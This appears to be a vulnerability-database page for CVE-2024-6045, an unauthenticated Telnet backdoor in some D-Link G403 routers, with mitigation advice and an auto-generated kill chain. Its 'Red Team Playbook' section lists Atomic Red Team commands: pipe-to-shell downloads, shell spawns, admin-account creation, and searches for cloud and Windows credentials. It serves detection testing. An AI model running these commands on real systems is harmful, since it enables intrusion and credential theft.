CVE-2024-6045
Overview
This vulnerability is an authentication bypass caused by an undisclosed factory testing backdoor implemented in certain D-Link G403 wireless routers. The root cause lies in a hidden mechanism that enables Telnet service without standard authentication controls when a specific URL is accessed. The affected component is the router's embedded web interface and Telnet service activation logic, which can be triggered remotely from the local area network.
Vulnerability Description
Certain models of D-Link wireless routers contain an undisclosed factory testing backdoor. Unauthenticated attackers on the local area network can force the device to enable Telnet service by accessing a specific URL and can log in by using the administrator credentials obtained from analyzing the firmware.
Impact
An attacker on the local network can remotely activate Telnet service without authentication and gain administrative access using credentials extracted from firmware analysis. This enables full control over the device, including configuration changes, data interception, and potential lateral movement within the network. No prior authentication or user interaction is required (AV:A/AC:L/PR:N/UI:N), increasing the risk of unauthorized access and persistent compromise of network infrastructure.
Solution
D-Link has issued advisory SAP10398 addressing this vulnerability in specific G403 router models. Users should consult the vendor advisory at https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10398 for detailed patch instructions and firmware updates. Applying the latest firmware version that removes the factory testing backdoor is recommended. If immediate patching is not possible, restricting local network access to trusted users and disabling Telnet service if configurable are suggested interim mitigations.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The presence of an undisclosed factory testing backdoor in certain models of D-Link wireless routers poses a significant security risk. This vulnerability allows unauthenticated attackers on the local area network to enable Telnet service by accessing a specific URL. Once Telnet is activated, attackers can utilize administrator credentials that can be extracted from the firmware analysis. This backdoor effectively bypasses standard authentication mechanisms, allowing malicious actors to gain control over the device without any prior knowledge of the credentials or the need for user intervention.
Attack vectors for exploiting this vulnerability are relatively straightforward. An attacker with local network access can initiate the exploit by simply visiting the designated URL, which triggers the enabling of Telnet service. Once Telnet is active, the attacker can log in using the default administrator credentials, which are often hardcoded or easily retrievable from the firmware. This scenario could unfold in various environments, including residential networks, small businesses, and even larger organizational infrastructures where these routers are deployed. The potential for lateral movement within a network increases significantly once an attacker gains access to a router, as they can then pivot to other connected devices, potentially compromising sensitive information or critical systems.
The real-world impact of this vulnerability is profound, particularly for businesses that rely on D-Link routers for their networking needs. An attacker exploiting this backdoor could gain unauthorized access to sensitive data, disrupt network operations, or even launch further attacks against other connected systems. The financial implications can be severe, encompassing costs related to data breaches, regulatory fines, and damage to reputation. Furthermore, the presence of such a vulnerability undermines customer trust, as users expect their networking devices to be secure and resilient against external threats. For organizations, the risk extends beyond immediate financial loss; it can also affect long-term strategic goals and operational integrity.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regular firmware updates are crucial, as manufacturers often release patches to address known vulnerabilities. Network segmentation can also be employed to limit access to critical systems, ensuring that even if a router is compromised, the attacker cannot easily access sensitive data or systems. Additionally, monitoring network traffic for unusual behavior can help identify unauthorized access attempts. Organizations should also consider disabling Telnet service entirely if it is not needed, as this can significantly reduce the attack surface. Lastly, educating users about the importance of changing default credentials and securing their devices can further enhance overall network security.
In conclusion, the undisclosed factory testing backdoor in certain D-Link wireless routers represents a critical vulnerability that can be exploited by attackers with minimal effort. The implications for businesses are significant, encompassing both immediate risks and long-term consequences. By adopting proactive detection and mitigation strategies, organizations can safeguard their networks against such vulnerabilities, ensuring a more secure operational environment. The importance of maintaining robust security practices cannot be overstated, especially in an era where cyber threats are increasingly sophisticated and prevalent.
Affected Products
No CPE information available.
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-191 | Read Sensitive Constants Within an Executable |
35%
|
— | Low | |
| CAPEC-70 | Try Common or Default Usernames and Passwords |
31%
|
Medium | High |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
net user #{guest_user} /active:yes
sudo sysadminctl -guestAccount on
net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-6045 |
| twcert.org.tw |
GitHub CVE
third-party-advisory
|
https://www.twcert.org.tw/tw/cp-132-7879-da630-1.html |
| twcert.org.tw |
GitHub CVE
third-party-advisory
|
https://www.twcert.org.tw/en/cp-139-7880-629f5-2.html |
| supportannouncement.us.dlink.com |
GitHub CVE
vendor-advisory
|
https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10398 |